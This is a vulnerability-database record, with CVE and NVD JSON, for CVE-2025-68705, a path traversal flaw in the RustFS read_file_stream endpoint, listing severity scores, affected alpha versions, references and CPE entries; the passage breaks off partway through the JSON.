CVE-2025-68705 (GCVE-0-2025-68705)

Vulnerability from cvelistv5 – Published: 2026-01-07 20:31 – Updated: 2026-01-07 21:28

Title

RustFS Path Traversal Vulnerability

Summary

RustFS is a distributed object storage system built in Rust. In versions 1.0.0-alpha.13 to 1.0.0-alpha.78, RustFS contains a path traversal vulnerability in the /rustfs/rpc/read_file_stream endpoint. This issue has been patched in version 1.0.0-alpha.79.

Severity ?

8.8 (High)


                        
                          CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:P

CWE

CWE-22 - Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')

Assigner

GitHub_M

References

URL

Tags

	https://github.com/rustfs/rustfs/security/advisor…	x_refsource_CONFIRM
	https://github.com/rustfs/rustfs/commit/ab752458c…	x_refsource_MISC

Impacted products

	Vendor	Product	Version
	rustfs	rustfs	Affected: >= 1.0.0-alpha.13, < 1.0.0-alpha.79

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2025-68705",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "yes"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-01-07T21:28:18.981006Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-01-07T21:28:30.316Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "rustfs",
          "vendor": "rustfs",
          "versions": [
            {
              "status": "affected",
              "version": "\u003e= 1.0.0-alpha.13, \u003c 1.0.0-alpha.79"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "RustFS is a distributed object storage system built in Rust. In versions 1.0.0-alpha.13 to 1.0.0-alpha.78, RustFS contains a path traversal vulnerability in the /rustfs/rpc/read_file_stream endpoint. This issue has been patched in version 1.0.0-alpha.79."
        }
      ],
      "metrics": [
        {
          "cvssV4_0": {
            "attackComplexity": "LOW",
            "attackRequirements": "NONE",
            "attackVector": "NETWORK",
            "baseScore": 8.8,
            "baseSeverity": "HIGH",
            "privilegesRequired": "NONE",
            "subAvailabilityImpact": "NONE",
            "subConfidentialityImpact": "NONE",
            "subIntegrityImpact": "NONE",
            "userInteraction": "NONE",
            "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:P",
            "version": "4.0",
            "vulnAvailabilityImpact": "NONE",
            "vulnConfidentialityImpact": "HIGH",
            "vulnIntegrityImpact": "HIGH"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-22",
              "description": "CWE-22: Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-01-07T20:31:44.236Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/rustfs/rustfs/security/advisories/GHSA-pq29-69jg-9mxc",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/rustfs/rustfs/security/advisories/GHSA-pq29-69jg-9mxc"
        },
        {
          "name": "https://github.com/rustfs/rustfs/commit/ab752458ce431c6397175d167beee2ea00507d3e",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/rustfs/rustfs/commit/ab752458ce431c6397175d167beee2ea00507d3e"
        }
      ],
      "source": {
        "advisory": "GHSA-pq29-69jg-9mxc",
        "discovery": "UNKNOWN"
      },
      "title": "RustFS Path Traversal Vulnerability"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2025-68705",
    "datePublished": "2026-01-07T20:31:44.236Z",
    "dateReserved": "2025-12-23T22:32:51.733Z",
    "dateUpdated": "2026-01-07T21:28:30.316Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "nvd": "{\"cve\":{\"id\":\"CVE-2025-68705\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-01-07T21:15:59.383\",\"lastModified\":\"2026-01-16T19:29:47.410\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"RustFS is a distributed object storage system built in Rust. In versions 1.0.0-alpha.13 to 1.0.0-alpha.78, RustFS contains a path traversal vulnerability in the /rustfs/rpc/read_file_stream endpoint. This issue has been patched in version 1.0.0-alpha.79.\"}],\"metrics\":{\"cvssMetricV40\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"4.0\",\"vectorString\":\"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X\",\"baseScore\":8.8,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"attackRequirements\":\"NONE\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"vulnConfidentialityImpact\":\"HIGH\",\"vulnIntegrityImpact\":\"HIGH\",\"vulnAvailabilityImpact\":\"NONE\",\"subConfidentialityImpact\":\"NONE\",\"subIntegrityImpact\":\"NONE\",\"subAvailabilityImpact\":\"NONE\",\"exploitMaturity\":\"PROOF_OF_CONCEPT\",\"confidentialityRequirement\":\"NOT_DEFINED\",\"integrityRequirement\":\"NOT_DEFINED\",\"availabilityRequirement\":\"NOT_DEFINED\",\"modifiedAttackVector\":\"NOT_DEFINED\",\"modifiedAttackComplexity\":\"NOT_DEFINED\",\"modifiedAttackRequirements\":\"NOT_DEFINED\",\"modifiedPrivilegesRequired\":\"NOT_DEFINED\",\"modifiedUserInteraction\":\"NOT_DEFINED\",\"modifiedVulnConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedVulnIntegrityImpact\":\"NOT_DEFINED\",\"modifiedVulnAvailabilityImpact\":\"NOT_DEFINED\",\"modifiedSubConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedSubIntegrityImpact\":\"NOT_DEFINED\",\"modifiedSubAvailabilityImpact\":\"NOT_DEFINED\",\"Safety\":\"NOT_DEFINED\",\"Automatable\":\"NOT_DEFINED\",\"Recovery\":\"NOT_DEFINED\",\"valueDensity\":\"NOT_DEFINED\",\"vulnerabilityResponseEffort\":\"NOT_DEFINED\",\"providerUrgency\":\"NOT_DEFINED\"}}],\"cvssMetricV31\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\",\"baseScore\":9.8,\"baseSeverity\":\"CRITICAL\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":3.9,\"impactScore\":5.9}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-22\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:rustfs:rustfs:1.0.0:alpha13:*:*:*:rust:*:*\",\"matchCriteriaId\":\"BD2476D6-257C-4A96-BED4-D8B002402242\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:rustfs:rustfs:1.0.0:alpha14:*:*:*:rust:*:*\",\"matchCriteriaId\":\"774EC64C-73ED-4D6B-893B-30A066DA934C\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:rustfs:rustfs:1.0.0:alpha15:*:*:*:rust:*:*\",\"matchCriteriaId\":\"4B567F4F-131F-4D4B-8C0C-9212F22F2BB3\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:rustfs:rustfs:1.0.0:alpha16:*:*:*:rust:*:*\",\"matchCriteriaId\":\"711F7641-A2B2-410B-B05D-6656F9A1798F\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:rustfs:rustfs:1.0.0:alpha17:*:*:*:rust:*:*\",\"matchCriteriaId\":\"EB79AC62-2B79-441C-BC09-4C834C32EADA\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:rustfs:rustfs:1.0.0:alpha18:*:*:*:rust:*:*\",\"matchCriteriaId\":\"62DE84EE-9F3B-460A-AC13-D2B8CCBC5B4E\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:rustfs:rustfs:1.0.0:alpha19:*:*:*:rust:*:*\",\"matchCriteriaId\":\"DEF70599-6550-49D2-9800-FE3249A66568\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:rustfs:rustfs:1.0.0:alpha20:*:*:*:rust:*:*\",\"matchCriteriaId\":\"FDFE93A5-B6D7-482A-A891-4D8844604C07\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:rustfs:rustfs:1.0.0:alpha21:*:*:*:rust:*:*\",\"matchCriteriaId\":\"79AC4F00-B006-46C2-863F-2946BB02B58E\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:rustfs:rustfs:1.0.0:alpha22:*:*:*:rust:*:*\",\"matchCriteriaId\":\"E313A243-ED56-498D-988F-E088693EBB61\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:rustfs:rustfs:1.0.0:alpha23:*:*:*:rust:*:*\",\"matchCriteriaId\":\"D3A60CB7-1F01-4A60-8555-C225AC89B959\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:rustfs:rustfs:1.0.0:alpha24:*:*:*:rust:*:*\",\"matchCriteriaId\":\"1C98618D-CF5D-406B-8AA5-34B412F3D43D\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:rustfs:rustfs:1.0.0:alpha25:*:*:*:rust:*:*\",\"matchCriteriaId\":\"98373960-FEDB-4933-92D5-2A597045DD23\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:rustfs:rustfs:1.0.0:alpha26:*:*:*:rust:*:*\",\"matchCriteriaId\":\"83E0E1A5-3C07-45FF-80FD-0DB375E1575E\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:rustfs:rustfs:1.0.0:alpha27:*:*:*:rust:*:*\",\"matchCriteriaId\":\"C2D66076-4005-4F58-A8E2-69062053D786\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:rustfs:rustfs:1.0.0:alpha28:*:*:*:rust:*:*\",\"matchCriteriaId\":\"1D8CB0F5-299F-4BB0-B264-F5642DD991C4\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:rustfs:rustfs:1.0.0:alpha29:*:*:*:rust:*:*\",\"matchCriteriaId\":\"96E20418-FE0C-4202-8771-FFF8EBB1B62D\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:rustfs:rustfs:1.0.0:alpha30:*:*:*:rust:*:*\",\"matchCriteriaId\":\"810A17F9-AEEA-4396-B437-120789BBE882\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:rustfs:rustfs:1.0.0:alpha31:*:*:*:rust:*:*\",\"matchCriteriaId\":\"7B1FECD4-E993-417D-AEA7-F8E97DC6A5FA\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:rustfs:rustfs:1.0.0:alpha32:*:*:*:rust:*:*\",\"matchCriteriaId\":\"3839F299-E0E7-4994-A8AC-B67A534C9847\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:rustfs:rustfs:1.0.0:alpha33:*:*:*:rust:*:*\",\"matchCriteriaId\":\"46CAEA4E-5DFD-4668-ABF0-DC53EB04EE7B\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:rustfs:rustfs:1.0.0:alpha34:*:*:*:rust:*:*\",\"matchCriteriaId\":\"591075AB-81EF-4D42-A2A0-FA28BC6B78CC\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:rustfs:rustfs:1.0.0:alpha35:*:*:*:rust:*:*\",\"matchCriteriaId\":\"FD46ED07-6DCC-4BF8-A4E8-78B2FF6DCE4C\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:rustfs:rustfs:1.0.0:alpha36:*:*:*:rust:*:*\",\"matchCriteriaId\":\"6DF15533-D6E1-49B0-B30A-6FEECC7AE06C\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:rustfs:rustfs:1.0.0:alpha37:*:*:*:rust:*:*\",\"matchCriteriaId\":\"EC68F03A-D299-4BFB-A99E-4B08E4E0848F\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:rustfs:rustfs:1.0.0:alpha38:*:*:*:rust:*:*\",\"matchCriteriaId\":\"0DD60024-CAB2-4DA6-A9CA-503D2631E98B\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:rustfs:rustfs:1.0.0:alpha39:*:*:*:rust:*:*\",\"matchCriteriaId\":\"32470ED0-7873-41A3-B2D5-7CD444ED0A45\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:rustfs:rustfs:1.0.0:alpha40:*:*:*:rust:*:*\",\"matchCriteriaId\":\"E2EFC74D-40E7-426C-9F7B-3B654F2B940F\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:rustfs:rustfs:1.0.0:alpha41:*:*:*:rust:*:*\",\"matchCriteriaId\":\"EAAF504E-51A5-492B-887E-BB67788B899C\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:rustfs:rustfs:1.0.0:alpha42:*:*:*:rust:*:*\",\"matchCriteriaId\":\"35C83244-D2C7-4D70-9C0B-D0590B00C608\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:rustfs:rustfs:1.0.0:alpha43:*:*:*:rust:*:*\",\"matchCriteriaId\":\"429E4ECD-997A-4D3B-9DE2-60835AE14473\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:rustfs:rustfs:1.0.0:alpha44:*:*:*:rust:*:*\",\"matchCriteriaId\":\"5DDDBAA5-D207-498C-A6F0-79F07806C511\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:rustfs:rustfs:1.0.0:alpha45:*:*:*:rust:*:*\",\"matchCriteriaId\":\"81758B85-6D2B-4914-96EC-E4CCDE2F9A52\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:rustfs:rustfs:1.0.0:alpha46:*:*:*:rust:*:*\",\"matchCriteriaId\":\"D439B484-E32D-4A6A-84EE-9307A028F736\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:rustfs:rustfs:1.0.0:alpha47:*:*:*:rust:*:*\",\"matchCriteriaId\":\"FDA137F7-DC8A-44F4-8061-F502AC8DD7BF\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:rustfs:rustfs:1.0.0:alpha48:*:*:*:rust:*:*\",\"matchCriteriaId\":\"AE3EF7B3-E8C0-4844-9165-3A26EB426615\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:rustfs:rustfs:1.0.0:alpha49:*:*:*:rust:*:*\",\"matchCriteriaId\":\"EB40D926-AE20-46A7-9B6E-ED1BADB9A08B\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:rustfs:rustfs:1.0.0:alpha50:*:*:*:rust:*:*\",\"matchCriteriaId\":\"3A43A950-59A6-4343-815A-953C11DC3F13\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:rustfs:rustfs:1.0.0:alpha51:*:*:*:rust:*:*\",\"matchCriteriaId\":\"87B36190-C30B-45BC-9738-BE0B3321025D\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:rustfs:rustfs:1.0.0:alpha52:*:*:*:rust:*:*\",\"matchCriteriaId\":\"86A2967C-E2C6-4C73-9BDE-CCECACDB2B02\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:rustfs:rustfs:1.0.0:alpha53:*:*:*:rust:*:*\",\"matchCriteriaId\":\"5E10A654-E265-4469-8099-ABBB1F5D8BCF\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:rustfs:rustfs:1.0.0:alpha54:*:*:*:rust:*:*\",\"matchCriteriaId\":\"762591A8-A0A2-45D2-B15F-1E85DFC5CA86\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:rustfs:rustfs:1.0.0:alpha55:*:*:*:rust:*:*\",\"matchCriteriaId\":\"53DE196C-1914-40AE-854D-4988073D57C3\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:rustfs:rustfs:1.0.0:alpha56:*:*:*:rust:*:*\",\"matchCriteriaId\":\"5BE55B7E-3806-4F8A-B09C-7B9D173D3FAE\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:rustfs:rustfs:1.0.0:alpha57:*:*:*:rust:*:*\",\"matchCriteriaId\":\"8CF07DA6-11F6-4A19-9FD9-1955EC22C779\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:rustfs:rustfs:1.0.0:alpha58:*:*:*:rust:*:*\",\"matchCriteriaId\":\"1A571B98-0EE7-46A6-8514-3E02F9CE969A\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:rustfs:rustfs:1.0.0:alpha59:*:*:*:rust:*:*\",\"matchCriteriaId\":\"3263EEC7-94FF-4802-BCB2-0C3713079439\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:rustfs:rustfs:1.0.0:alpha60:*:*:*:rust:*:*\",\"matchCriteriaId\":\"FA13E6EE-A889-408E-8503-2F57A5E46CE1\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:rustfs:rustfs:1.0.0:alpha61:*:*:*:rust:*:*\",\"matchCriteriaId\":\"4D28A63E-ADE5-4DEC-8E75-0884A7011613\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:rustfs:rustfs:1.0.0:alpha62:*:*:*:rust:*:*\",\"matchCriteriaId\":\"21E6129E-565C-45AE-A0C8-2D1B623EEC9D\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:rustfs:rustfs:1.0.0:alpha63:*:*:*:rust:*:*\",\"matchCriteriaId\":\"046F640C-18E9-4FC4-812D-8E4CAAFCAE55\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:rustfs:rustfs:1.0.0:alpha64:*:*:*:rust:*:*\",\"matchCriteriaId\":\"BFB217B7-78AA-4D16-9A2B-863BD6CD01B6\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:rustfs:rustfs:1.0.0:alpha65:*:*:*:rust:*:*\",\"matchCriteriaId\":\"F8EEF3FF-410B-40F3-A144-CD61ED394109\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:rustfs:rustfs:1.0.0:alpha66:*:*:*:rust:*:*\",\"matchCriteriaId\":\"E3494138-7FE7-4152-935C-C1C35179064B\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:rustfs:rustfs:1.0.0:alpha67:*:*:*:rust:*:*\",\"matchCriteriaId\":\"9E0461BC-0E45-4F9F-A837-4D9FC8852A75\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:rustfs:rustfs:1.0.0:alpha68:*:*:*:rust:*:*\",\"matchCriteriaId\":\"E259407D-61CF-4956-A456-57F131334456\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:rustfs:rustfs:1.0.0:alpha69:*:*:*:rust:*:*\",\"matchCriteriaId\":\"B6E44EF8-98A5-47F5-B7E9-3199EB08FAC1\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:rustfs:rustfs:1.0.0:alpha70:*:*:*:rust:*:*\",\"matchCriteriaId\":\"F4CBBD85-02F9-491A-8845-59EFB88F2DAF\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:rustfs:rustfs:1.0.0:alpha71:*:*:*:rust:*:*\",\"matchCriteriaId\":\"2271380A-3AE1-4954-8D16-5065C8E88D32\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:rustfs:rustfs:1.0.0:alpha72:*:*:*:rust:*:*\",\"matchCriteriaId\":\"DB3F6C7E-71E4-427A-96F4-F62DE0ED9450\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:rustfs:rustfs:1.0.0:alpha73:*:*:*:rust:*:*\",\"matchCriteriaId\":\"980BEAAE-143E-4F28-9A2F-58CED3D296E9\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:rustfs:rustfs:1.0.0:alpha74:*:*:*:rust:*:*\",\"matchCriteriaId\":\"8E14C88E-CE9B-44DA-98DE-280C0D6E4C8D\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:rustfs:rustfs:1.0.0:alpha75:*:*:*:rust:*:*\",\"matchCriteriaId\":\"EEC13614-61AD-45A7-B7FA-07346D33CACF\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:rustfs:rustfs:1.0.0:alpha76:*:*:*:rust:*:*\",\"matchCriteriaId\":\"6B3E9EB0-0A41-4146-B6A9-49B1A70358DC\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:rustfs:rustfs:1.0.0:alpha77:*:*:*:rust:*:*\",\"matchCriteriaId\":\"CBDD75C5-1A08-4758-9324-172C1D539322\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:rustfs:rustfs:1.0.0:alpha78:*:*:*:rust:*:*\",\"matchCriteriaId\":\"96461CC0-012C-40D7-B1CB-FF9A6B7EB644\"}]}]}],\"references\":[{\"url\":\"https://github.com/rustfs/rustfs/commit/ab752458ce431c6397175d167beee2ea00507d3e\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/rustfs/rustfs/security/advisories/GHSA-pq29-69jg-9mxc\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2025-68705\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"yes\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-01-07T21:28:18.981006Z\"}}}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-01-07T21:28:26.931Z\"}}], \"cna\": {\"title\": \"RustFS Path Traversal Vulnerability\", \"source\": {\"advisory\": \"GHSA-pq29-69jg-9mxc\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV4_0\": {\"version\": \"4.0\", \"baseScore\": 8.8, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:P\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"attackRequirements\": \"NONE\", \"privilegesRequired\": \"NONE\", \"subIntegrityImpact\": \"NONE\", \"vulnIntegrityImpact\": \"HIGH\", \"subAvailabilityImpact\": \"NONE\", \"vulnAvailabilityImpact\": \"NONE\", \"subConfidentialityImpact\": \"NONE\", \"vulnConfidentialityImpact\": \"HIGH\"}}], \"affected\": [{\"vendor\": \"rustfs\", \"product\": \"rustfs\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003e= 1.0.0-alpha.13, \u003c 1.0.0-alpha.79\"}]}], \"references\": [{\"url\": \"https://github.com/rustfs/rustfs/security/advisories/GHSA-pq29-69jg-9mxc\", \"name\": \"https://github.com/rustfs/rustfs/security/advisories/GHSA-pq29-69jg-9mxc\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/rustfs/rustfs/commit/ab752458ce431c6397175d167beee2ea00507d3e\", \"name\": \"https://github.com/rustfs/rustfs/commit/ab752458ce431c6397175d167beee2ea00507d3e\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"RustFS is a distributed object storage system built in Rust. In versions 1.0.0-alpha.13 to 1.0.0-alpha.78, RustFS contains a path traversal vulnerability in the /rustfs/rpc/read_file_stream endpoint. This issue has been patched in version 1.0.0-alpha.79.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-22\", \"description\": \"CWE-22: Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-01-07T20:31:44.236Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2025-68705\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-01-07T21:28:30.316Z\", \"dateReserved\": \"2025-12-23T22:32:51.733Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-01-07T20:31:44.236Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }
  }
}

FKIE_CVE-2025-68705

Vulnerability from fkie_nvd - Published: 2026-01-07 21:15 - Updated: 2026-01-16 19:29

Severity ?

9.8 (Critical) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Summary

References

	URL	Tags
	security-advisories@github.com	https://github.com/rustfs/rustfs/commit/ab752458ce431c6397175d167beee2ea00507d3e	Patch
	security-advisories@github.com	https://github.com/rustfs/rustfs/security/advisories/GHSA-pq29-69jg-9mxc	Exploit, Vendor Advisory

Impacted products

Vendor	Product	Version
rustfs	rustfs	1.0.0
rustfs	rustfs	1.0.0
rustfs	rustfs	1.0.0
rustfs	rustfs	1.0.0
rustfs	rustfs	1.0.0
rustfs	rustfs	1.0.0
rustfs	rustfs	1.0.0
rustfs	rustfs	1.0.0
rustfs	rustfs	1.0.0
rustfs	rustfs	1.0.0
rustfs	rustfs	1.0.0
rustfs	rustfs	1.0.0
rustfs	rustfs	1.0.0
rustfs	rustfs	1.0.0
rustfs	rustfs	1.0.0
rustfs	rustfs	1.0.0
rustfs	rustfs	1.0.0
rustfs	rustfs	1.0.0
rustfs	rustfs	1.0.0
rustfs	rustfs	1.0.0
rustfs	rustfs	1.0.0
rustfs	rustfs	1.0.0
rustfs	rustfs	1.0.0
rustfs	rustfs	1.0.0
rustfs	rustfs	1.0.0
rustfs	rustfs	1.0.0
rustfs	rustfs	1.0.0
rustfs	rustfs	1.0.0
rustfs	rustfs	1.0.0
rustfs	rustfs	1.0.0
rustfs	rustfs	1.0.0
rustfs	rustfs	1.0.0
rustfs	rustfs	1.0.0
rustfs	rustfs	1.0.0
rustfs	rustfs	1.0.0
rustfs	rustfs	1.0.0
rustfs	rustfs	1.0.0
rustfs	rustfs	1.0.0
rustfs	rustfs	1.0.0
rustfs	rustfs	1.0.0
rustfs	rustfs	1.0.0
rustfs	rustfs	1.0.0
rustfs	rustfs	1.0.0
rustfs	rustfs	1.0.0
rustfs	rustfs	1.0.0
rustfs	rustfs	1.0.0
rustfs	rustfs	1.0.0
rustfs	rustfs	1.0.0
rustfs	rustfs	1.0.0
rustfs	rustfs	1.0.0
rustfs	rustfs	1.0.0
rustfs	rustfs	1.0.0
rustfs	rustfs	1.0.0
rustfs	rustfs	1.0.0
rustfs	rustfs	1.0.0
rustfs	rustfs	1.0.0
rustfs	rustfs	1.0.0
rustfs	rustfs	1.0.0
rustfs	rustfs	1.0.0
rustfs	rustfs	1.0.0
rustfs	rustfs	1.0.0
rustfs	rustfs	1.0.0
rustfs	rustfs	1.0.0
rustfs	rustfs	1.0.0
rustfs	rustfs	1.0.0
rustfs	rustfs	1.0.0

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:rustfs:rustfs:1.0.0:alpha13:*:*:*:rust:*:*",
              "matchCriteriaId": "BD2476D6-257C-4A96-BED4-D8B002402242",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:rustfs:rustfs:1.0.0:alpha14:*:*:*:rust:*:*",
              "matchCriteriaId": "774EC64C-73ED-4D6B-893B-30A066DA934C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:rustfs:rustfs:1.0.0:alpha15:*:*:*:rust:*:*",
              "matchCriteriaId": "4B567F4F-131F-4D4B-8C0C-9212F22F2BB3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:rustfs:rustfs:1.0.0:alpha16:*:*:*:rust:*:*",
